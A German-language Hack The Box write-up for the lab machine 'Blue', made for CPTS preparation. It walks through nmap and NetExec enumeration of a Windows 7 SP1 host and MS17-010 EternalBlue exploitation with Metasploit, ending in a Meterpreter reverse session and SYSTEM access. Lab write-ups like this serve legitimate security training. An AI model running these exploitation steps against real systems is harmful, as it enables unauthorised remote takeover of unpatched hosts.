← Zurück zu Machines

HTB · published

Blue

Hack The Box CPTS-Roadmap Writeup für Blue: Windows 7 SP1, SMBv1, MS17-010 EternalBlue und direkter SYSTEM-Zugriff.

HTBRoadmap CPTSWriteupWindowsSMBEternalBlueMachine

Metadaten

  • Name: Blue
  • IP Address: 10.129.168.63
  • Plattform: Windows
  • Kategorie: SMB / MS17-010 / EternalBlue
  • Schwierigkeit: Easy
  • Ziel(e): User, Root / SYSTEM
  • Kurzbeschreibung: Blue ist eine der bekanntesten und einfachsten Maschinen auf Hack The Box. Sie zeigt sehr direkt, wie kritisch die SMBv1-Schwachstelle MS17-010 beziehungsweise EternalBlue war. Über Port 445 wird Windows 7 SP1 erkannt, die Maschine als verwundbar bestätigt und anschließend direkt SYSTEM-Zugriff erzielt.

Reconnaissance / Enumeration

Der initiale Full-Port-Scan zeigte SMB/RPC und mehrere dynamische Windows-Ports:

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.129.168.63
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Der Service-Scan auf den wichtigsten Ports bestätigte ein altes Windows-System:

nmap -p 135,139,445 -sCV -oA scans/nmap-tcpscripts 10.129.168.63
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Wichtige Nmap-Erkenntnisse:

Host: HARIS-PC
OS: Windows 7 Professional 7601 Service Pack 1
Workgroup: WORKGROUP
SMB message signing: disabled / not required
SMBv1: present

Damit war MS17-010 sofort ein sehr naheliegender Prüfpunkt.

SMB Enumeration

Mit NetExec wurden die SMB-Shares enumeriert:

netexec smb 10.129.168.63 -u user -p pass --shares
SMB         10.129.168.63   445    HARIS-PC   [*] Windows 7 / Server 2008 R2 Build 7601 x64
SMB         10.129.168.63   445    HARIS-PC   [*] Enumerated shares

Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
IPC$                            Remote IPC
Share           READ
Users           READ

Die Kombination aus Windows 7 SP1, SMBv1 und deaktiviertem Signing machte EternalBlue sehr wahrscheinlich.

Vulnerability Scan

Der Nmap-Vuln-Scan bestätigte MS17-010:

nmap -p 445 -vvv --script vuln -oA scans/nmap-smbvulns 10.129.168.63
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Damit war der Exploit-Weg klar: EternalBlue gegen SMB auf Port 445.

Exploitation: MS17-010 EternalBlue

Für die Ausnutzung wurde das Metasploit-Modul verwendet:

exploit/windows/smb/ms17_010_eternalblue

Relevante Optionen:

RHOSTS         10.129.168.63
RPORT          445
VERIFY_ARCH    true
VERIFY_TARGET  true

Ausführung:

msf exploit(windows/smb/ms17_010_eternalblue) > run

Erfolgreiche Session:

[*] 10.129.168.63:445 - Sending egg to corrupted connection.
[*] 10.129.168.63:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 10.129.168.63
[+] 10.129.168.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.118:4444 -> 10.129.168.63:49158)

Die Meterpreter-Session lief direkt als SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Damit waren Foothold und Privilege Escalation in einem Schritt erledigt.

User Flag

Die User-Flag lag im Desktop-Verzeichnis von haris:

type C:\Users\haris\Desktop\user.txt
7a8f3[REDACTED-USER-FLAG]1444

Root Flag

Da die Session bereits als NT AUTHORITY\SYSTEM lief, konnte die Root-Flag direkt gelesen werden:

type C:\Users\Administrator\Desktop\root.txt
7c89a[REDACTED-ROOT-FLAG]9f1f

Post-Exploitation

  • User: Zugriff auf C:\Users\haris\Desktop\user.txt.
  • Root / Admin: SYSTEM-Zugriff über EternalBlue.
  • Root-Flag: Zugriff auf C:\Users\Administrator\Desktop\root.txt.
  • Lateral Movement: Nicht nötig.
  • Separate Privilege Escalation: Nicht nötig, da der Exploit direkt SYSTEM lieferte.

Lessons Learned

  • Windows 7 SP1 ist ein starker Hinweis: Bei alten Windows-Systemen gehört MS17-010 sofort auf die Checkliste.
  • SMBv1 ist kritisch: SMBv1 auf Port 445 war hier der zentrale Angriffsvektor.
  • Message Signing hilft bei der Einordnung: Nicht erforderliches SMB-Signing ist ein gefährlicher Footprint.
  • Nmap Vuln-Scripts sind nützlich: smb-vuln-ms17-010 bestätigte die Vermutung schnell.
  • EternalBlue zeigt Impact sehr direkt: Ein einzelner SMB-RCE führte direkt zu NT AUTHORITY\SYSTEM.

Notizen

Blue ist technisch simpel, aber als Lernmaschine extrem wertvoll: Sie zeigt, warum veraltete Systeme und ungepatchtes SMBv1 ein katastrophales Risiko darstellen. Für CPTS ist sie ein guter Reminder, alte Services nicht zu übersehen und bekannte Schwachstellen systematisch zu prüfen.